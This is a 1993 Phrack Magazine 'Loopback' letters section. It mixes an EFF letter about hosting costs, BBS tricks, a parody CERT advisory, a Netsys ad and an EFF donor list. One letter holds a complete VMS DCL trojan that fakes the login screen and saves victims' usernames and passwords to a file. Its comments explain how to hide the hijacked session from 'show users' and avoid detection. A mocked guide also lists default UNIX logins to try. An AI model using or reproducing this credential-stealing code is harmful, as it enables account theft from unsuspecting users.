| ==Phrack Magazine== |
|
|
| Volume Four, Issue Forty-Three, File 2 of 27 |
|
|
| Phrack Loopback |
| Part I |
|
|
| **************************************************************************** |
|
|
| COMING NEXT ISSUE |
|
|
| Van Eck Info (Theory & Practice) |
| More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming) |
| HUGE University Dialup List (Mail Us YOUR School's Dialup NOW!) |
| Neato Plans For Evil Devices |
| Gail Thackeray Gifs |
|
|
| *********************************** M A I L ********************************* |
|
|
| Chris, |
|
|
| Craig Neidorf gave me these addresses as ways to reach you. He tells me |
| that you are currently editing Phrack. I hope you are well. |
|
|
| Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that |
| eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our |
| IUP connection, was charging us an extra $1,000 per month. They did some |
| investigation at my request. We determined that Phrack traffic alone was |
| responsible for over 40% of the total bytes transferred from the site over |
| the past year or so. This is several gigabytes per month. All in all, the |
| CuD archive, which contains Phrack, CuD, and other publications accounts |
| for 85% of our total traffic. All of the email to and from EFF, Usenet |
| traffic, and other FTP (from the EFF archive, the CAF archive, and others) |
| constitutes about 15%. |
|
|
| EFF isn't going to be able to carry it any more because it is effectively |
| costing us $1,000 per month. The fundamental problem is that Phrack is so |
| popular (at least as a free good) to cause real expense in transmission |
| costs. Ultimately the users are going to have to pay the costs because |
| bandwidth (when measures in gigabytes anyway) isn't free. The 12K per |
| year it costs us to carry Phrack is not something which EFF can justify in |
| its budget. I'm sure you can understand this. |
|
|
| On July 1, eff.org moves from Cambridge to Washington, DC which is when I |
| expect we will stop carrying it. I wanted to raise this issue now to let |
| you know in advance of this happening. |
|
|
| I have also asked Chris and Helen to talk to Brendan Kehoe, who actually |
| maintains the archive, to see whether there is anything we can do to help |
| find another site for Phrack or make any other arrangement which will |
| result in less loss of service. |
|
|
| Mitch |
|
|
|
|
|
|
| ------------------------------------------------------------------------------ |
| Mitchell Kapor, Electronic Frontier Foundation |
| Note permanent new email address for all correspondence as of 6/1/93 |
| mkapor@kei.com |
|
|
|
|
| [Editor: Well, all things must come to an end. Looks like EFF's |
| move to Washington is leaving behind lots of bad |
| memories, and looking forward to a happy life in the hotbed |
| of American politics. We wish them good luck. We also |
| encourage everyone to join.........CPSR. |
|
|
| In all fairness, I did ask Mitch more detail about the |
| specifics of the cost, and he explained that EFF was paying |
| flat rate for a fractional T-1, and whenever they went over |
| their allotted bandwidth, they were billed above and beyond |
| the flat rate. Oh well. Thank GOD for Len Rose. |
| Phrack now has a new home at ftp.netsys.com.] |
|
|
| **************************************************************************** |
|
|
| I'm having a really hard time finding a lead to the Information |
| America Network. I am writing you guys as a last resort. Could |
| you point me in the right direction? Maybe an access number or |
| something? Thanks you very much. |
|
|
| [Editor: You can reach Information America voice at 404-892-1800. |
| They will be more than happy to send you loads of info.] |
|
|
| **************************************************************************** |
|
|
| To whom it may concern: |
| This is a submission to the next issue of phrack...thanks for the great |
| 'zine! |
| ----------------------------cut here------------------------------- |
| Greetings Furds: |
|
|
| Have you ever wanted to impress one of those BBS-babes with your astounding |
| knowledge of board tricks? Well *NOW* you can! Be the life of the party! |
| Gain and influence friends! Irritate SysOps! Attain the worship and |
| admiration of your online pals. Searchlight BBS systems (like many other |
| software packages) have internal strings to display user information in |
| messages/posts and the like. They are as follows (tested on Searchlight BBS |
| System v2.25D): |
|
|
| \%A = displays user's access level |
| \%B = displays baud rate connected at |
| \%C = unknown |
| \%F = unknown |
| \%G = displays graphics status |
| \%K = displays user's first name |
| \%L = displays system time |
| \%M = displays user's time left on system |
| \%N = displays user's name in format: First Last |
| \%O = times left to call "today" |
| \%P = unknown |
| \%S = displays line/node number and BBS name |
| \%T = displays user's time limit |
| \%U = displays user's name in format: FIRST_LAST |
|
|
| All you gotta do is slam the string somewhere in the middle of a post or |
| something and the value will be inserted for the reader to see. |
|
|
| Example: Hey there chump, I mean \%K, you better you better UL or log |
| off of \%S...you leach too damn many files..you got \%M mins |
| left to upload some new porn GIFs or face bodily harm and |
| mutilation!. |
|
|
| ---------------------------- |
|
|
| Have phun! |
| Inf0rmati0n Surfer (& Dr. Cloakenstein) |
| SysOp Cranial Manifestations vBBS |
|
|
|
|
| [Editor: Ya know, once a LONG LONG time ago, I got on a BBS and |
| while reading messages noticed that a large amount of |
| messages seemed to be directed at ME!!# It took me |
| about 10 minutes to figure it out, but BOY WAS I MAD! |
|
|
| Then I added my own \%U message for the next hapless fool. |
| :) BIG FUN!] |
|
|
| **************************************************************************** |
|
|
| -(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)- |
|
|
| SotMESC |
|
|
| The US SotMESC Chapter is offering |
| Scholarships for the 1993 school term. |
|
|
| Entries should be single-spaced paragraphs, |
| Double-spacing between paragraphs. |
|
|
| The subject should center on an aspect of the |
| Computer Culture and be between 20-30 pages long. |
|
|
| Send entries to: |
|
|
| SotMESC |
| PO Box 573 |
| Long Beach, MS 39560 |
|
|
| All entries submitted will become the property of the SotMESC |
|
|
| -()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()- |
|
|
| **************************************************************************** |
|
|
| The Southwest Netrunner's League's |
| ----------------------------------------------------------------- |
| WareZ RoDeNtZ Guide to UNIX!!!! |
| ----------------------------------------------------------------- |
|
|
| Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas) |
| Assists by:SysCon XIV (The Ma'Bell Rapist) |
| Iron Man MK 4a (Things that make ya go boom) |
|
|
| This file begs to be folded, spindeled,and mutilated. |
| No Rights Reserved@1993 |
|
|
| ----------------------------------------------------------------- |
|
|
| Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu |
|
|
| Coming this September.... Shadowland, 68020... Watch this space. |
| ----------------------------------------------------------------- |
|
|
| Part I(Basic commands) |
|
|
| Phile Commands: ls=List Philes |
| more,page=Display Phile on Yo Terminal |
| cp=Copy Phile |
| mv=Move or Remove Philes |
| rm=Remove Philes |
|
|
| Editor Commnds: vi=Screen Editor |
|
|
| Dirtory cmmnds: dir=Prints Directory |
| mkdir=Makes a new Directory(also a VERY bad bug) |
| rmdir=Remove a Directory |
| pwd=print working directory |
|
|
| Misc. Commands: apropos=Locate commands by keyword lookup. |
| whatis=Display command description. |
| man=Displays manual pages online. |
| cal=Prints calendar |
| date=Prints the time and date. |
| who=Prints out every one who is logged in |
| (Well, almost everyone 7:^] ) |
|
|
| --------------------------------------------------------------- |
|
|
| Part II(Security(UNIX security, another OXYMORON 7:^] )) |
|
|
| If you are a useless wAReZ r0dEnT who wants to try to Netrun |
| a UNIX system, try these logins.... |
|
|
| root |
| unmountsys |
| setup |
| makefsys |
| sysadm |
| powerdown |
| mountfsys |
| checkfsys |
|
|
|
|
| All I can help ya with on da passwords iz ta give you some |
| simple guidelines on how they are put together.... |
|
|
| 6-8 characters |
| 6-8 characters |
| 1 character is a special character (exmpl:# ! ' & *) |
|
|
| ----------------------------------------------------------------- |
|
|
| Well thats all fo' now tune in next time, same Hack-time |
| same Hack-channel!!! |
|
|
|
|
| THE TECHNOMANCER I have taken all knowledge |
| af604@FreeNet.hsc.colorado.edu |
| to be my province |
|
|
| -- |
| Technomancer |
| Southwest Netrunner's League |
|
|
| ***************************************************************** |
|
|
| [Editor: This is an example of what NOT to send to Phrack. |
| This is probably the worst piece of garbage I've |
| received, so I had to print it. I can only hope |
| that it's a private joke that I just don't get. |
|
|
| Uh, please don't try to write something worse and |
| submit it hoping to have it singled out as the |
| next "worst," since I'll just ignore it.] |
|
|
| **************************************************************************** |
|
|
| Dear Phrack, |
| I was looking through Phrack 42 and noticed the letters about password |
| stealers. It just so happened that the same day I had gotten extremely |
| busted for a program which was infinitely more indetectible. Such is life. |
| I got off pretty well being an innocent looking female so it's no biggie. |
| Anyway, I deleted the program the same day because all I could think was |
| "Shit, I'm fucked". I rewrote a new and improved version, and decided to |
| submit it. The basic advantages of this decoy are that a) there is no |
| login failure before the user enters his or her account, and b) the |
| program defines the show users command for the user so that when they |
| do show users, the fact that they are running out of another account |
| doesn't register on their screen. |
| There are a couple holes in this program that you should probably be |
| aware of. Neither of these can kick the user back into the account that |
| the program is running from, so that's no problem, but the program can |
| still be detected. (So basically, don't run it out of your own account... |
| except for maybe once...to get a new account to run it out of) First, once |
| the user has logged into their account (out of your program of course) hitting |
| control_y twice in a row will cause the terminal to inquire if they are |
| doing this to terminate the session on the remote node. Oops. It's really no |
| problem though, because most users wouldn't even know what this meant. The |
| other problem is that, if the user for some strange reason redefines show: |
|
|
| $show == "" |
|
|
| then the show users screen will no longer eliminate the fact that the account |
| is set host out of another. That's not a big deal either, however, because |
| not many people would sit around randomly deciding to redefine show. |
| The reason I was caught was that I (not even knowing the word "hacker" |
| until about a month ago) was dumb enough to let all my friends know about the |
| program and how it worked. The word got spread to redefine show, and that's |
| what happened. The decoy was caught and traced to me. Enough BS...here's the |
| program. Sorry...no UNIX...just VMS. |
| Lady Shade |
|
|
| I wrote the code...but I got so many ideas from my buddies: |
| Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice |
|
|
| ------------------------------------------------ |
|
|
| $if p1 .eqs. "SHOW" then goto show |
| $sfile = "" |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! The role of the dummy file in this program is to tell if the program !!!! |
| !!!! is being used as a decoy or as a substitute login for the victim. It !!!! |
| !!!! does not stay in your directory after program termination. !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $sfile = f$search("sys$system:[ZJABAD_X]dummy.txt") |
| $if sfile .nes. "" then goto other |
| $open/write io user.dat |
| $close io |
| $open/write dummy instaar_device:[miller_g]dummy.txt |
| $close dummy |
| $wo == "write sys$output" |
| $line = "" |
| $user = "" |
| $pass = "" |
| $a$ = "" |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! A login screen with a message informing someone of new mail wouldnt !!!! |
| !!!! be too cool... !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $set broadcast=nomail |
| $set message/noidenficitaion/noseverity/nofacility/notext |
| $on error then goto outer |
| $!on control_y then goto inner |
| $wo " [H [2J" |
| $wo "" |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! insert a fake logout screen here !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $wo " ZJABAD_X logged out at ", f$time() |
| $wo " [2A" |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! This is the main body of the program. It simulates the system login !!!! |
| !!!! screen. It also grabs the username and password and sticks them in !!!! |
| !!!! a file called user.dat !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $outer: |
| $set term/noecho |
| $inquire a$/nopun "" |
| $inquire a$/nopun "" |
| $set term/echo |
| $c = 0 |
| $c1 = 0 |
| $c2 = 0 |
| $inner: |
| $c2 = c2 + 1 |
| $if c2 .eqs. 5 then goto speedup |
| $c = c + 1 |
| $if c .eqs. 15 then goto fail |
| $if c1 .eqs. 3 then goto fail3 |
| $user = "a" |
| $wo "Username: " |
| $from_speedup: |
| $set term/uppercase |
| $wo " [2A" |
| $read/time_out=10/prompt=" [9C " sys$command user |
| $if user .eqs. "a" then goto timeout |
| $set term/nouppercase |
| $if user .eqs. "" then goto inner |
| $set term/noecho |
| $inquire pass "Password" |
| $set term/echo |
| $if user .eqs. "ME" then goto done |
| $if pass .eqs. "" then goto fail |
| $open/append io user.dat |
| $write io user + " " + pass |
| $close io |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! Sends the user into their account !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $open/write io set.com |
| $write io "$set host 0" |
| $write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT" |
| $write io pass |
| $close io |
| $@set |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! Control has been returned to your account !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $write io " [2A" |
| $goto outer |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! Simulates a failure if the password is null, and also if the !!!! |
| !!!! username prompt has cycled through 15 times... This is what !!!! |
| !!!! the system login screen does. !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $fail: |
| $c = 1 |
| $c1 = c1 + 1 |
| $wo "User authorization failure" |
| $wo " [1A" |
| $goto inner |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! After the third failure, the system usually sends the screen back !!!! |
| !!!! one step...this just handles that. !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $fail3: |
| $wo " [2A" |
| $goto outer |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! The system keeps a timeout check in the login. If a username is not !!!! |
| !!!! entered quickly enough, the timeout message is activated !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $timeout: |
| $set term/nouppercase |
| $wo "Error reading command input" |
| $wo "Timeout period expired" |
| $wo " [2A" |
| $goto outer |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! There is a feature in this program which sets the terminal to !!!! |
| !!!! uppercase for the input of a username. This is wonderful for !!!! |
| !!!! preventing program detection, but it does cause a problem. It slows !!!! |
| !!!! the screen down, which looks suspicious. So, in the case where a !!!! |
| !!!! user walks up tot he terminal and holds the return key down for a !!!! |
| !!!! bit before typing in their username, this section speeds up the run !!!! |
| !!!! considerably. !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $speedup: |
| $set term/nouppercase |
| $fast_loop: |
| $user = "a" |
| $read/time_out=1/prompt="Username: " sys$command io |
| $if user .eqs. "a" then goto from_speedup |
| $goto fast_loop |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! This section is optional. There are many ways that you can implement !!!! |
| !!!! to break out of the program when you think you have gotten enough !!!! |
| !!!! passwords. 1), you can sit down at the terminal and type in a string !!!! |
| !!!! for the username and pass which kicks you out. If this option is !!!! |
| !!!! implemented, you should at least put in something that looks like !!!! |
| !!!! you have just logged in, the program should not kick straight back !!!! |
| !!!! to your command level, but rather execute your login.com. 2) You !!!! |
| !!!! can log in to the account which is stealing the password from a !!!! |
| !!!! different terminal and stop the process on the account which is !!!! |
| !!!! running the program. This is much safer, and my recommandation. !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $done: |
| $set broadcast=mail |
| $set message/facility/text/identification/severity |
| $delete dummy.txt;* |
| $exit |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! This section is how one covers up the fact that the account which has !!!! |
| !!!! been stolen is running out of another. Basically, the area of the show!!!! |
| !!!! users screen which registers this is at the far right hand side. !!!! |
| !!!! This section first writes the show users data to a file and alters !!!! |
| !!!! it before it is written to the screen for viewing by the user. There !!!! |
| !!!! may exist many forms of the show users command in your system, and !!!! |
| !!!! you may have to handle each one differently. I have written only two !!!! |
| !!!! manipulations into this code to be used as an example. But looking !!!! |
| !!!! at how this is preformed should be enough to allow you to write your !!!! |
| !!!! own special cases. Notice that what happens to activate this section !!!! |
| !!!! of the program is the computer detects the word "show" and interprets !!!! |
| !!!! it as a procedure call. The words following show become variables !!!! |
| !!!! passed into the program as p1, p2, etc. in the order which they !!!! |
| !!!! were typed after the word show. Also, by incorporating a third data !!!! |
| !!!! file into the manipulations, one can extract the terminal id for the !!!! |
| !!!! account which the program is running out of and plug this into the !!!! |
| !!!! place where the user's line displays his or her terminal id. Doing !!!! |
| !!!! this is better that putting in a fake terminal id, but that is just a !!!! |
| !!!! minor detail. !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $show: |
| $show = "" |
| $show$ = "" |
| $length = 0 |
| $ch = "" |
| $full = 0 |
| $c = 0 |
| $if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1' |
| $if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull |
| $if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users |
| $if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit |
| $if p3 .eqs. "" then goto fallout |
| $goto full |
| $fallout: |
| $show 'p2' 'p3' |
| $exit |
| $ufull: |
| $show users/full/output=users.dat |
| $goto manipulate |
| $full: |
| $show$ = p3 + "/output=users.dat" |
| $show users 'show$' |
| $manipulate: |
| $set message/nofacility/noseverity/notext/noidentification |
| $open/read io1 users.dat |
| $open/write io2 users2.dat |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! Control_y must be dealt with here. If the user did happen to controlY !!! |
| !!!! there is a chance that the files users.dat and users2.dat could be !!! |
| !!!! left in their directory. That is a bad thing as we are trying to !!! |
| !!!! prevent detection :) !!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $on control_y then goto aborted |
| $user = "" |
| $test = "" |
| $long = "" |
| $ch = "" |
| $length = 0 |
| $user = f$user() |
| $length = f$length(user) - 2 |
| $user = f$extract(1,length,user) |
| $read_loop: |
| $read/end_of_file=eof io1 line |
| $test = f$extract(1,length,line) |
| $ch = f$extract (length+1,1,line) |
| $if (test .eqs. user) .and. (ch .eqs. " ") then goto change |
| $from_change: |
| $write io2 line |
| $goto read_loop |
| $eof: |
| $close io1 |
| $close io2 |
| $type users2.dat |
| $del users.dat;* |
| $del users2.dat;* |
| $show == "@instaar_device:[MILLER_G]findnext show" |
| $set message/facility/text/severity/identification |
| $exit |
| $change: |
| $if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)" |
| $goto from_change |
| $aborted: |
| $!if f$search("users.dat") .nes. "" then close io1 |
| $!if f$search("users.dat") .nes. "" then delete users.dat;* |
| $!if f$search("users2.dat") .nes. "" then close io2 |
| $!if f$search("users2.dat") .nes. "" then delete users2.dat;* |
| $close io1 |
| $close io2 |
| $delete users.dat;* |
| $delete users2.dat;* |
| $show == "@instaar_device:[MILLER_G]findnext show" |
| $set message/facility/text/severity/identification |
| $exit |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| !!!! This is the section of the program which is executed in place of the !!!! |
| !!!! users login.com. It does grab their login and execute it to prevent !!!! |
| !!!! suspicion, but there are a couple of hidden commands which are also !!!! |
| !!!! added. They redefine the show and sys commands so that the user can !!!! |
| !!!! not detect that he or she is riding off of another account. !!!! |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| $other: |
| $sh$ = "@instaar_device:[miller_g]findnext show" |
| $shline = "$sh*ow ==" + sh$ |
| $logi = "" |
| $logi = f$search("login.com") |
| $if logi .NES. "" then goto Ylogin |
| $nologin: |
| $open/write io login2.com |
| $write io shline |
| $close io |
| $@login2 |
| $delete login2.com;* |
| $exit |
| $ylogin: |
| $open/write io2 login2.com |
| $open/read io1 login.com |
| $transfer_loop: |
| $read/end_of_file=ready io1 line |
| $write io2 line |
| $goto transfer_loop |
| $ready: |
| $write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show"" |
| $close io1 |
| $close io2 |
| $@login2 |
| $delete login2.com;* |
| $exit |
|
|
|
|
| [Editor: Thanks for the letter and program. I wish I could bring |
| myself to use a VMS and try it out. :) Always happy |
| to get notice that somewhere out there a female reads |
| Phrack. By the way, "innocent female" is an oxymoron.] |
|
|
| **************************************************************************** |
|
|
| To: Phrack Loopback. |
| From: White Crocodile. |
|
|
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports" is |
| really cool invention and I (sorry for egoisthic "I") with pleasure |
| wasting time for his reading ( ex. my playboy time ). But here for |
| some unknown reason appear equal style, and all loopback remind |
| something medium between "relations search" [Hello Dear Phrack, I am |
| security expert of our local area, but when I looked to output of |
| "last" program (oh,yeah - "last" it is ...), I ocassionaly under - |
| standed what apparently someone elite hacker penetrated into my |
| unpassworded account! But how he knew it??? I need to talk |
| with him! Please mail me at security@...] and "make yourself" [Yep.I |
| totally wrote program which gets file listing from target vicitim's |
| home directory in current host. After that I decided to contribute |
| it for You. I hope this will help. Here is the complete C code. "rx" |
| permission in target's '$HOME' required.]. |
| Looking similar articles like "... off Geek!" and various reports |
| which don't reacheds PWN. [CENSORED BY ME]. |
| Resulting from abovewritten reason and I let myself to add some |
| elite (oops word too complex), some bogus and little deposit to Your |
| lb. He written in classic plagiarize style. |
| !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
| * * * |
| Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what |
| it is horrible (don't read it please - this message to Bart), but I |
| doing it all the time (today already 3 month). I have not much time to |
| write, and here is the subject - I broke into one military computer |
| and stole their mail about new security bug!!! l00k f3r |t: |
|
|
| - - - |
| DDN & CERT |
| SPECIAL REPORT* |
| Sun 3.x,4.1.x login flaw |
|
|
| Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX |
| and many yet unknown systems) |
|
|
| Impact: Allow random intruders to gain "root" access. |
|
|
| Description: |
| The huge security hole was there and waiting! Type: |
|
|
| $ login root |
|
|
| [ no option required ], and You are! All what You need to know its |
| just root's password, but it (pw), sure, can be easily obtained from |
| real root, by asking him (root). Ex - "$ talk root" |
|
|
| Possible fix until copyrighted patch come out: |
|
|
| #rm /usr/bin/login |
| #cp /usr/games/fortune /usr/bin/login |
|
|
| If you believe that your system has been compromised, contact CERT CC. Call |
| our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in time |
| of "Silence of the Lamb"), leave Inet address of your system and number of |
| private credit card. |
| - - - |
|
|
| * Report not will be printed in cert advisories in this form, becouse FBI |
| need remove all hints and tips, and make him useless to intruders. |
|
|
| DISCLAIMER: Above document written by CERT, DDN and FBI - |
| all pretension to them. |
|
|
| Thanks to gr*k (I can't write his full name for security reasons),roxtar, |
| y0,Fidelio,2 scotts from Santafe,KL (He not have attitude towards this |
| mail,but I included him for polite since he reserved tickets for me to |
| SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for |
| hints to me, what this bug really exist (Yep, before I stoled report). |
|
|
| - Write You later - anonymous. |
|
|
| P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK |
| and sure Erik Bloodaxe. And also - IF after E911 incident you are more |
| carefully, feel free to replace "stole" to "got" (when you'll post it), and |
| do not forget to add "reprinted with permission". |
|
|
| - Sincerely, anonymous. |
|
|
| ---------------------------------------------------------------------- |
|
|
| [Editor: More indications that we will all be raided by the DEA |
| more often than the FBI in coming years.] |
|
|
| ***************************************************************************** |
|
|
|
|
| "Since my probation status forces me to be adamant about this. Illegal |
| activities on Netsys cannot and will not be tolerated. Prison sucked." |
|
|
| - Len Rose |
|
|
| 06/6/93 |
|
|
| NETSYS COMMUNICATION SERVICES Palo Alto, California |
|
|
| Netsys is a network of large Sun servers dedicated to providing |
| Internet access to individuals and corporations that need solid, |
| reliable Internet connectivity. Netsys is at the hub of major |
| Internet connectivity. |
|
|
| Netsys is a system for professionals in both the Internet and Unix |
| community. The public image is important to us. Illegal activities |
| cannot be tolerated. |
|
|
| Netsys has every feature you could possibly need. |
|
|
| Netsys is lightly loaded, extremely reliable and dedicated to providing |
| full time 24 hour Internet access. |
|
|
| Support: 24 hour emergency response service. |
|
|
| Dialups: Palo Alto area, High Speed (V.32 and PEP) |
|
|
| Private Accounts: $20 monthly ( with file storage capacity of 5 megabytes) |
|
|
| $1 per megabyte per month over 5 megabytes. |
|
|
| Commercial Accounts: $40 monthly (file storage capacity of 10 megabytes) |
| $1 per megabyte per month over 10 megabytes. |
|
|
| Newsfeeds: We offer both nntp and uucp based newsfeeds , with all domestic |
| newsgroups, and including all foreign newsgroups. |
|
|
| SPECIAL FEATURES THAT NO ONE ELSE CAN PROVIDE |
|
|
| Satellite Weather: Netsys has available real time satellite weather |
| imagery. Images are available in gif, or Sun raster |
| format. Contact us for NFS mirroring, and other special |
| arrangement. These images are directly downlinked from |
| the GOES bird. Contact Steve Eigsti (steve@netsys.com) |
|
|
| Satellite Usenet: Netsys is offering Pagesat's satellite newsfeed service |
|
|
| for large volume news distribution. Members of Netsys |
| can obtain substantial discounts for the purchase and |
| service costs of this revolutionary method of Usenet news |
| distribution. Both Unix and MS Windows software available. |
| Contact (pagesat@pagesat.com) for product information. |
|
|
| Paging Services: Netsys is offering Pagesat's Internet to Pager mail service. |
| Members of Netsys can obtain critical email to pager |
| services. Pagesat has the ability to gateway any critical |
| electronic mail to your display pager. |
|
|
| Leased Line Internet Connections |
|
|
| Pagesat Inc. offers low cost 56k and T1 Internet connections all over the |
| United States. Since Pagesat is an FCC common carrier, our savings on |
| leased lines can be passed on to you. For further information, contact |
| Duane Dubay (djd@pagesat.com). |
|
|
| We offer other services such as creating domains, acting as MX |
| forwarders, and of course uucp based newsfeeds. |
|
|
| Netsys is now offering completely open shell access to Internet users. |
| For accounts, or more information , send mail to netsys@netsys.com |
|
|
| Netsys will NEVER accept more members than our capacity to serve. |
|
|
| Netsys prides itself on it's excellent connectivity (including multiple T1's, |
| and SMDS), lightly loaded systems, and it's clientele. |
|
|
| We're not your average Internet Service Provider. And it shows. |
| -------------------------------------------------------------------- |
| [Editor: We here at Phrack are forever in debt to Mr. Len Rose for |
| allowing us to use ftp.netsys.com as our new official FTP |
| site after getting the boot off EFF. It takes a steel |
| set of huevos to let such an evil hacker publication |
| reside on your hard drive after serving time for having |
| dealings with evil hackers. We are STOKED! Thanks Len! |
| Netsys is not your average site, INDEED!] |
|
|
| **************************************************************************** |
|
|
| Something Phrack might like to see: |
|
|
| The contributors to and practices of the Electronic Frontier Foundation |
| disclose quite accurately, just who this organization represents. We |
| challenge the legitimacy of the claim that this is a "public interest" |
| advocate. Here is a copy of their list of contributors: |
|
|
| [FINS requested the Office of the Attorney General of the Commonwealth of |
| Massachusetts to provide us with a list of contributors of over $5000, to |
| the Electronic Frontier Foundation, required by IRS Form 990. Timothy E. |
| Dowd, of the Division of Public Charities, provided us with a list (dated |
| January 21, 1993), containing the following information. No response was |
| given to a phone request by FINS directly to EFF, for permission to inspect |
| and copy the most current IRS Form 990 information.] |
|
|
|
|
|
|
| ELECTRONIC FRONTIER FOUNDATION, INC. |
| IRS FORM 990. PART I - LIST OF CONTRIBUTIONS |
|
|
|
|
| NAME AND ADDRESS OF CONTRIBUTOR CONTRIBUTION |
| DATE AMOUNT |
|
|
| Kapor Family Foundation |
| C/O Kapor Enterprises, Inc. |
| 155 2nd Street |
| Cambridge, MA 02141 Var 100,000 |
|
|
| Mitchell D. Kapor |
| 450 Warren Street |
| Brookline, MA 02146 Var 324,000 |
|
|
| Andrew Hertzfeld |
| 370 Channing Avenue |
| Palo Alto, CA 94301 12/12/91 5,000 |
|
|
|
|
| Dunn & Bradstreet |
| C/O Michael F. ... |
| 1001 G Street, NW Suite 300 East |
| Washington, DC 20001 02/12/92 10,000 |
|
|
| National Cable Television |
| 1724 Massachusetts Avenue, NW |
| Washington, DC 20036 02/18/92 25,000 |
|
|
|
|
| MCI Communications Corporation |
| 1133 19th Street, NW |
| Washington, DC 20036 03/11/92 15,000 |
|
|
